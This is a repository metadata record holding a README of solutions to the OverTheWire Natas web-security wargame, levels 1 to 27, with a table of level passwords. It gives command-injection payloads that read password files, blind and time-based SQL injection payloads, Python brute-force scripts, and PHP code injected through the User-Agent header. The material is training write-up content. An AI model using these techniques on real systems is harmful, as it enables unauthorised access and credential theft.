{"id":18426674,"url":"https://github.com/dr4ks/natas_labs_solution","last_synced_at":"2026-01-23T14:45:14.343Z","repository":{"id":159716262,"uuid":"633005921","full_name":"Dr4ks/Natas_Labs_Solution","owner":"Dr4ks","description":"Hello, this is repository which has solutions for Natas Labs.","archived":false,"fork":false,"pushed_at":"2023-04-26T15:21:19.000Z","size":2082,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-13T20:57:01.000Z","etag":null,"topics":["bugbounty","cryptography","ctf","cyber-defense","cybersecurity","ethical-hacking","exploit-development","forensics","natas-labs-solutions","network","network-sec","penetration-testing","security","security-tools","vulnerability-analysis","web-exploitation"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Dr4ks.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-04-26T15:19:51.000Z","updated_at":"2023-05-29T10:58:58.000Z","dependencies_parsed_at":null,"dependency_job_id":"c19614a5-052c-46e7-b89e-694107f80943","html_url":"https://github.com/Dr4ks/Natas_Labs_Solution","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Dr4ks/Natas_Labs_Solution","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FNatas_Labs_Solution","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FNatas_Labs_Solution/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FNatas_Labs_Solution/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FNatas_Labs_Solution/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Dr4ks","download_url":"https://codeload.github.com/Dr4ks/Natas_Labs_Solution/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FNatas_Labs_Solution/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28694457,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-23T14:15:13.573Z","status":"ssl_error","status_checked_at":"2026-01-23T14:09:05.534Z","response_time":59,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","cryptography","ctf","cyber-defense","cybersecurity","ethical-hacking","exploit-development","forensics","natas-labs-solutions","network","network-sec","penetration-testing","security","security-tools","vulnerability-analysis","web-exploitation"],"created_at":"2024-11-06T05:08:31.250Z","updated_at":"2026-01-23T14:45:14.320Z","avatar_url":"https://github.com/Dr4ks.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Hi, I'm Dr4ks! 👋\n\n## 🚀 About Me\nI'm a Cyber Security student.\n\n## 🔗 Links\n[![linkedin](https://img.shields.io/badge/linkedin-0A66C2?style=for-the-badge\u0026logo=linkedin\u0026logoColor=white)](https://www.linkedin.com/in/sahib-humbatzada-42b082223/)\n[![hackerrank](https://img.shields.io/badge/HackerRank-2EC866?style=for-the-badge\u0026logo=hackerrank\u0026logoColor=white)](https://www.hackerrank.com/Dr4ks)\n[![tryhackme](https://img.shields.io/badge/tryhackme-1DB954?style=for-the-badge\u0026logo=tryhackme\u0026logoColor=white)](https://tryhackme.com/p/Dr4ks)\n[![github](https://img.shields.io/badge/GitHub-100000?style=for-the-badge\u0026logo=github\u0026logoColor=white)](https://github.com/Dr4ks)\n\n## 🛠 Skills\nPentesting\n\n\n# Natas_Labs Solution\nNatas is a web-based wargame that challenges players to solve a series of challenges by exploiting various security vulnerabilities. The challenges start out relatively easy and become progressively more difficult. The objective is to learn and practice web security concepts, such as SQL injection, cross-site scripting (XSS), and authentication bypass.\n\nThe challenges in Natas are divided into levels, each of which has its own URL and set of credentials. Players must navigate through the levels and find a password or some other hidden information in order to proceed to the next level.\n\n**You can access to these labs from below link** \u003cbr /\u003e\nLink=\u003ehttps://overthewire.org/wargames/natas/\n\n![introduction](images/introduction.png)\n\n\n## Labs\n\n- [Natas 1](#natas1)\n- [Natas 2](#natas2)\n- [Natas 3](#natas3)\n- [Natas 4](#natas4)\n- [Natas 5](#natas5)\n- [Natas 6](#natas6)\n- [Natas 7](#natas7)\n- [Natas 8](#natas8)\n- [Natas 9](#natas9)\n- [Natas 10](#natas-10)\n- [Natas 11](#natas-11)\n- [Natas 12](#natas-12)\n- [Natas 13](#natas-13)\n- [Natas 14](#natas-14)\n- [Natas 15](#natas-15)\n- [Natas 16](#natas-16)\n- [Natas 17](#natas-17)\n- [Natas 18](#natas-18)\n- [Natas 19](#natas-19)\n- [Natas 20](#natas-20)\n- [Natas 21](#natas-21)\n- [Natas 22](#natas-22)\n- [Natas 23](#natas-23)\n- [Natas 24](#natas-24)\n- [Natas 25](#natas-25)\n- [Natas 26](#natas-26)\n- [Natas 27](#natas-27)\n\n\n\n# Natas1\nWe just find the password of natas1 on **source code** of http://natas0.natas.labs.overthewire.org/\n![natas1](images/natas1.png)\n\n# Natas2\nEven though, we cannot do right click on mouse on web page. We just use keyboard **(Ctrl+U)** to find password of Natas2\n![natas2](images/natas2.png)\n\n# Natas3\nAfter we looking at the **source code** of web page.We just see files directory and we just look at this directory and find sensitive file.\n![natas3half](images/natas3half.png)\n\nYes here we have the password of natas3.\n![natas3](images/natas3.png)\n\n\n# Natas4\nHere, We just do **Directory Fuzzing** to find hidden directories.\n![natas4half](images/natas4half.png)\n\nAfter analyzing this directory. We find password of natas4.\n![natas4](images/natas4.png)\n\n# Natas5\nWhenever, we just open page, we just see that we can be authorized when request come from specific URL.\nThat's why we need to intercept the request and change **Referer** header of request.\n![natas5](images/natas5.png)\n\n# Natas6\nAfter we open page, we see that Not Logged In problem and couldn't find anything on source page.\nI just analyze request and look at the **Cookie** header of request.\nI just modify 0 with 1 to be logged in.\n![natas6](images/natas6.png)\n\n# Natas7\nWe just analyze the **source code** of web page and understand the directory \"includes/secret.inc\".\n![natas71](images/natas71.png)\nWe get secret of natas7 from \"includes/secret.inc\".\n![natas72](images/natas72.png)\nFinally, we write the secret and get password of natas7.\n![natas7](images/natas7.png)\n\n# Natas 8\nAgain, we look at the source code and see the thing which we saw on introduction page of CTF that passwords are located /etc/natas_webpass directory.\n![natas81](images/natas81.png)\n\nAnd we just modify URL as because on index.php file , there is **page** parameter, after modifying this, we find password of natas8.\n![natas8](images/natas8.png)\n\n# Natas 9\nHere, we just analyze the source code and see that there is **encoded secret**.\n![natas91](images/natas91.png)\n\nAfter analyzing on Cyberchef and found basic Entropy of encryption.\n![natas9](images/natas9.png)\n\nEntering the encryption key and get password of natas9.\n![natas92](images/natas92.png)\n\n# Natas 10\nHere we just, see that our input executed as command on Linux system. Here **Command Injection** vulnerability appears.\n![natas101](images/natas101.png)\n\nThe most known character for OS injection is semicolon(;).\nPayload=\u003e ;cat /etc/natas_webpass/natas10\n![natas10](images/natas10.png)\n\n# Natas 11\nAs on previous section, **Command Injection** vulnerability appears but with a little bit hard **regex** which we need to bypass to execute commands.\nThe regular expression /[;|\u0026]/ disallows the characters semicolon (;), pipe (|), and ampersand (\u0026).\n![natas111](images/natas111.png)\n\nHere, to make easy for me, I just fuzz the **needle** parameter with OS injection payloads.\n![natas112](images/natas112.png)\n\nFinally, I just modify filename with file that contains password of natas11.\n%0A=\u003enewline %20=\u003espace\n![natas11](images/natas11.png)\n\n# Natas 12\nTo solve this lab, we just need to understand the encryption algorithm of Cookie that we need to change value inside of this which needs to be like this \"showpassword=yes\", then we can easily see password of natas12.\n\nWe understand that, our clear_data like this (array( \"showpassword\"=\u003e\"no\", \"bgcolor\"=\u003e\"#ffffff\"))\n\n1.First, we need to decrypt our cookie and get value.\n![natas121](images/natas121.png)\n\n2.From here, we just analyze that json_encode function is also used in backend.\n![natas122](images/natas122.png)\n\n3.And finally, predefined XOR encoding, we got key (KNHL)\n![natas123](images/natas123.png)\n\nNow it's time to encrypt our pass_data (array( \"showpassword\"=\u003e\"yes\", \"bgcolor\"=\u003e\"#ffffff\"))\n![natas12](images/natas12.png)\n\nFinally, we got password of natas12.\n![natas12result](images/natas12result.png)\n\n# Natas 13\nHere, we just are in front of application which have **File Upload Vulnerability**, so that we just intercept the request while image uploading,\nchange filename,content-type also body of file which will read the password of natas13.\n\n![natas131](images/natas131.png)\n\nThen, we browse the file and get the password of natas13.\n![natas13](images/natas13.png)\n\n# Natas 14\nIt is the same **File Upload Vulnerability** vuln as previous one, here we just modify content of malicious file with bytes of image, as because web application just checks first 20 or 30 bytes of content.\n\n![natas141](images/natas141.png)\n\nThen, we browse the file and get password of natas14.\n![natas14](images/natas14.png)\n\n# Natas 15\nNow, time to practice **SQL Injection\". To make easy for me , I just use Fuzzer by adding payloads for login bypass.\n![natas15](images/natas15.png)\n\n# Natas 16\nYes, it is also **SQL Injection**, but this one is **Blind (Boolean)** means we cannot see the result of SQLI on web page.\n \nPayload=\u003esmt\" UNION ALL SELECT 1,2 FROM users WHERE username=\"natas16\" AND substring(password,$1$,1)= BINARY \"$a$\" LIMIT 1 OFFSET 0;#\n\nFrom below result, response(913 bytes) is our answer.\n![natas16](images/natas16.png)\n\n\n# Natas 17\nNow, as we analyze the source code, we can see that our input executed as command, that's why **Command Injection(Blind)** appears.\nFor this, I just code python exploit, let's look at the exploit to find password of natas17.\n\n```python\nimport requests\nimport re\nimport string\n\nchars = string.ascii_lowercase + string.ascii_uppercase + string.digits\n\n\nuser = 'natas16'\npassw = 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V'\n\nurl = 'http://natas16.natas.labs.overthewire.org/'\n\nsession = requests.Session()\nresponse = session.get(url, auth = (user, passw) )\n\nseen_password = list()\nwhile ( len(seen_password) \u003c 32 ):\n\n\tfor character in chars:\n\t\tprint (\"\".join(seen_password) + character)\n\t\tresponse = session.post(url, data = { \"needle\" : \"anythings$(grep ^\" + \"\".join(seen_password) + character + \" /etc/natas_webpass/natas17)\" },auth = (user, passw) )\n\t\tcontent = response.text\n\n\n\t\treturned = re.findall( '\u003cpre\u003e\\n(.*)\\n\u003c/pre\u003e', content )\n\n\t\tif ( not returned ):\n\t\t\tseen_password.append( character )\n\t\t\tbreak\n```\n\n# Natas 18\nAgain, we come across with **SQL Injection(Time-Based)** vulnerability and I decide to solve this CTF, I use previous code by modifying exploit.\n\n```python\nimport requests\nimport re\nimport string\nfrom time import *\n\nchars = string.ascii_lowercase + string.ascii_uppercase + string.digits\n\nuser = 'natas17'\npassw = 'XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd'\n\nurl = 'http://natas17.natas.labs.overthewire.org/'\n\nsession=requests.Session()\nresponse=session.get(url,auth=(user,passw))\npospass=list()\n\nwhile(len(pospass)\u003c32):\n    for character in chars:\n        start_time=time()\n        print(\"\".join(pospass)+character)\n        \n        response=session.post(url,data={'username':'natas18\" AND BINARY password LIKE \"'+ \"\".join(pospass)+character+ '%\" AND SLEEP(1) # '},auth=(user,passw))\n        content=response.text\n\n        end_time=time()\n\n        dif=end_time-start_time\n\n        if dif\u003e1:\n            pospass.append(character)\n            break\n```\n\nHere, I just put image for you the output of code to imagine the purpose of exploit.\n![natas18](images/natas18.png)\n\n\n# Natas 19\nFrom this lab, I understood that here **PHPSESSSION** that which needs to be value 640 as maximum.\nFor that, we need to brute-force from 1 to 641 to log in as admin to see password of natas19.\nTo automate process, I just use ZAP.\n\n![natas19](images/natas19.png)\n\n\n# Natas 20\nThis lab looks like the previous one, but differnce is that **Session IDs** are not sequential.\nAs because they are just Hex-Encoded.\n![natas21](images/natas21.png)\n\nActually, it is simple again we just need to brute-forcing but here Payload Processing should be done.\nLet's try to do this with Python code, that we just enter clear_data to encode as HEX.\n\n```python\nfor i in range(1,641,1):\n    clear_data=f\"{i}-admin\"\n    print(clear_data.encode().hex())\n```\n\nOutputs of this code, we will use for brute-forcing.\n![natas20](images/natas20.png)\n\n\n# Natas 21\nOn this CTF, we just see PHPSESSID is not predictable, that's why we need to read source code.\nFrom source code analysis, I just understood that page checks session's **admin key** that is equal to 1 or not, then you can be admin.\nThat's why when we do POST request, we just get the previous session to use secondly to be admin user.\n\nI just implement Python code for this, you can look at.\n\n```python\nimport requests\n\ntarget = 'http://natas20.natas.labs.overthewire.org'\nauth = ('natas20', 'guVaZ3ET35LbgbFMoaN5tFcYT1jEP7UH')\n\n\n#First request to get session of admin\nparams = dict(name='admin\\nadmin 1', debug='') # \u003c-- this is the key part\ncookies = dict()\nresponse = requests.get(target, auth=auth, params=params, cookies=cookies)\nphpsessid = response.cookies['PHPSESSID']\nprint(response.text)\n\n\n#Second request to be admin\nparams = dict(debug='')\ncookies = dict(PHPSESSID=phpsessid)\nresponse = requests.get(target, auth=auth, params=params, cookies=cookies)\nprint(response.text)\n```\n\nYou can see also output of above code.\n![natas211](images/natas211.png)\n\n# Natas 22\nActually, this is similar to previous one, but here we get our admin session from **Specified URL on home page**.\nThat's why, I just modify previous script to find password.\n\n```python\nimport requests\n\ntarget = 'http://natas21.natas.labs.overthewire.org'\nauth = ('natas21', '89OWrTkGmiLZLv12JY4tLj2c4FW0xn56')\n\nexp_tar='http://natas21-experimenter.natas.labs.overthewire.org/?debug=true\u0026submit=1\u0026admin=1'\n\n\n#First POST request to get session of admin from exp_tar\nsession=requests.Session()\nresponse = session.post(exp_tar, auth=auth)\nadmin_session = session.cookies['PHPSESSID']\nprint(response.text)\n\n\n#Second request to be admin\nresponse = requests.get(target, auth=auth,cookies={\"PHPSESSID\":admin_session})\nprint(response.text)\n```\n\nYou can see also the output of above Python code.\n![natas22](images/natas22.png)\n\n\n# Natas 23\nOn this lab, I just understood from source code that, we need to block **Redirect** while requesting to specific parameter \"revelio\" which appeared on source code, too.\nThat's why to make this request easy for us, Python code is useful for us.We need to allow_redirects=False to GET request.\n\n```python\nimport requests\n\ntarget = 'http://natas22.natas.labs.overthewire.org/?revelio=1'\nauth = ('natas22', '91awVM9oDiUGm33JdzM7RVLBS8bz9n0s')\n\nsession=requests.Session()\nresponse = session.get(target, auth=auth,allow_redirects=False)\nprint(response.text)\n```\n\nYou can see output of code.\n![natas23](images/natas23.png)\n\n# Natas 24\nFrom source code, we can see that password which we need to enter should be inside \"iloveyou\" string and length of this higher than 10.\n\n![natas231](images/natas241.png)\n\nBut important part is here that, **PHP type** vuln which we just enter integer values.\n![natas24](images/natas24.png)\n\n# Natas 25\nOn this CTF, I just see **strcomp** method which is used to compare two strings.I just searched for this method to find anything on Internet.\nI found already.\n![natas251](images/natas251.png)\n\nI just do the same thing as above to solve CTF and it worked.\n![natas25](images/natas25.png)\n\n# Natas 26\nTo solve this CTF, vulnerable parameter for me is **lang** as because content is generated due to lang parameter's value.\nHere, **Directory Traversal** comes to my mind.\n\nHowever, we look at the source code and identifies that we just access to \"/etc/natas_webpass/natas26\" file(Code Injection on User-Agent) with session located \"var/www/natas/natas25/logs/\"\n\n```python\nimport requests\n\ntarget = 'http://natas25.natas.labs.overthewire.org/?revelio=1'\nauth = ('natas25', 'O9QD9DZBDq1YpswiTM5oqMDaOtuZtAcx')\n\nsession=requests.Session()\nmalhead={\"User-Agent\":'\u003c?php echo file_get_contents(\"/etc/natas_webpass/natas26\"); ?\u003e'}\n\nresponse = session.get(target, auth=auth)\nresponse=session.post(url=target,headers=malhead,auth=auth,data={\"lang\" : \"..././..././..././..././..././var/www/natas/natas25/logs/natas25_\" +  session.cookies['PHPSESSID'] + \".log\"})\nprint(response.text)\n```\nOutput of above code can be hidden, that's why I put image for you to see.\n![natas26](images/natas26.png)\n\n# Natas 27\nWhen we analyze the **Sessions** just see that there is session called \"drawing\" and encode this, we just see deserialized object.\nNow, we just maliciously modify this, makes serialized and get password of natas27.\n\n![natas271](images/natas271.png)\n\nAfter chaning session id, we just browse '/img/winner.php' file to see results.\n![natas27](images/natas27.png)\n\n\n\n# Usernames and Passwords\n| User     | Password |\n|----------|----------|\n| natas1    | g9D9cREhslqBKtcA2uocGHPfMZVzeFK6    |\n| natas2    | h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7    |\n| natas3    | G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q    |\n| natas4    | tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm    |\n| natas5    | Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD    |\n| natas6    | fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR    |\n| natas7    | jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr    |\n| natas8    | a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB    |\n| natas9    | Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd    |\n| natas10   | D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE   |\n| natas11   | 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg   |\n| natas12   | YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG   |\n| natas13   | lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9   |\n| natas14   | qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP   |\n| natas15   | TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB   |\n| natas16   | TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V   |\n| natas17   | XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd   |\n| natas18   | 8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq   |\n| natas19   | 8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s   |\n| natas20   | guVaZ3ET35LbgbFMoaN5tFcYT1jEP7UH   |\n| natas21   | 89OWrTkGmiLZLv12JY4tLj2c4FW0xn56   |\n| natas22   | 91awVM9oDiUGm33JdzM7RVLBS8bz9n0s   |\n| natas23   | qjA8cOoKFTzJhtV0Fzvt92fgvxVnVRBj   |\n| natas24   | 0xzF30T9Av8lgXhW7slhFCIsVKAPyl2r   |\n| natas25   | O9QD9DZBDq1YpswiTM5oqMDaOtuZtAcx   |\n| natas26   | 8A506rfIAXbKKk68yJeuTuRq4UfcK70k   |\n| natas27   | PSO8xysPi00WKIiZZ6s6PtRmFy9cbxj3   |\n\n## Authors\n- [@dr4ks](https://www.github.com/Dr4ks)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdr4ks%2Fnatas_labs_solution","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdr4ks%2Fnatas_labs_solution","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdr4ks%2Fnatas_labs_solution/lists"}